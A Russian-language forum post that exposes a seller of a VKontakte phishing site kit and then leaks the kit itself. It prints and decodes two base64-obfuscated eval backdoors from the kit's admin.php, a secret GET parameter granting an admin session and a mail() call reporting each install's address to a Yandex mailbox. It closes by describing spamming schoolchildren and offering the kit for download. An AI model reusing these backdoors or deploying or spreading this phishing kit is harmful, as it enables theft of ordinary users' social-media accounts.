Великий комбинатор

Скандалы, интриги, расследования! Разоблачение продавца дырявого фейка с зисмо (это такой совсем никакой школьный сайт) и его слив в паблик (для народа и без дырок).

Вступление.

Увидал я тему с продажей "[Метод] Добыча аккаунтов Вконтакте" ну думаю...

Описание темы:

Пишу автору узнать подробности...

Я: Что уникального в твоём фейке? "Человек получает, то что хотел за чем пришёл" - типо приходит за голосами и получает голоса?
Продавец: Типа приходит, регистрируется и выполняет задания.

Понятно, уникальность равна 1%

Ну будучи в здравом уме - я ничего никогда не покупаю. Наладив связи с модератором зисмо (не буду разглашать его ник по понятным причинам) - мне слили не только сам фейк и описание метода, а ещё и доступ в приватный раздел!

Анализ файлов.

Нам интересен только admin.php в котором есть кое-что необычное:

eval(base64_decode('aWYoaXNzZXQoJF9HRVRbJ0dDU0lBT0RKR0FB
T0RTWCddKSAmJiAkX0dFVFsnR0NTSUFPREpHQUFPRFNYJ10gPT
0gJ0REQkdKVVNPRUVITFNKTVNTSERGJyApeyRfU0VTU0lPTlsnY
WRtaW4nXSA9IHRydWU7aGVhZGVyKCdMb2NhdGlvbjogYWRtaW
4ucGhwJyk7fQ=='));

Потратив уйму времени, я, с большим трудом, всё же сумел расшифровать этот закодированный скрипт! Это было не легко! Вот результат:

if(isset($_GET['GCSIAODJGAAODSX'])
&& $_GET['GCSIAODJGAAODSX'] == 'DDBGJUSOEEHLSJMSSHDF' )
{$_SESSION['admin'] = true;
header('Location: admin.php');}

Что то мне подсказывает что это совсем не случайная ошибка... Самое главное что автор сумел "ошибиться" ещё в одном месте, но уже другим кодом:

eval(base64_decode('JGFkZHIgPSAkX1NFUlZFUlsnSFRUU
F9IT1NUJ10uJF9TRVJWRVJbJ1BIUF9TRUxGJ107bWFpb
CgiYnV4Z2F0ZUB5YW5kZXgucnUiLCAiUkVQT1JQVCB
GUk9NICIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLCAiRm
FrZSBydW5uaW5nIG9uIHNlcnZlciA6Ii4kYWRkcik7'));

Тут всё куда сложнее:

$addr = $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
mail("buxgate@yandex.ru", "REPORPT FROM ".$_SERVER['HTTP_HOST'],
"Fake running on server :".$addr);

Всё это служит для хищения акков покупателей, самое обидное что не только продавец но и я могу их слить!

Заключение

Продавец поступает не честно со своими покупателями, одни только правила чего стоят:

1. Запрещена продажа/выкладывание в паблик метода, а также частичной перепродажи.(при нарушении, имею право отказать в поддержки и обновлениях, а также направить защиту на перепродавца и его клиентов).
4. При умысленной порчи репутации продавца без веских на то причин,оставляю за собой право отказать в поддержке и обновлений временно или навсегда. 

Расшифрую:

1. Направить защиту - взломать фейк и слить аккаунты, после чего раздать в своём приватном разделе другим покупателям.

4. Наверное я сильно подпортил ему репутацию, но что он сделает? Направит "защиту" которой уже нету? Всё что было написано выше - служит только для хищения аккаунтов.

Метод спама: Спамить школьникам и людям у которых много времени и которые знают владельца аккаунта. Конец метода.

 Сам фейк, скачать его можно ниже.